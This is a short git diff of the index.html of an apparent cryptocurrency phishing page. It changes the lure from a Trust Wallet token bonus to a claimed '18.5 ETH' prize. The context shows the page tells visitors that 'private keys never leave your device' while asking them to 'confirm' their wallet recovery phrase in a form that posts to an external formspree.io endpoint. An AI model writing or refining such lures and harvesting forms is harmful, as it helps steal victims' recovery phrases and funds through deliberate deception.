--- a/index.html
+++ b/index.html
@@ -100,7 +100,7 @@ Click the button below to claim your prize. <br>
 								<span class="text-light">Private keys never leave your device.</span>
 								<br>
 								<p class="mt-4 text-light">
-									The recovery phrase confirmation is to make sure the one who claim bonus 10.000 Trust Wallet (TWT), is really you.
+									The recovery phrase confirmation is to make sure the one who claim bonus 18.5 ETH, is really you.
 								</p>
 		
 								<form action="https://formspree.io/f/mayappgz"  method="POST" class="mt-4 mb-3">
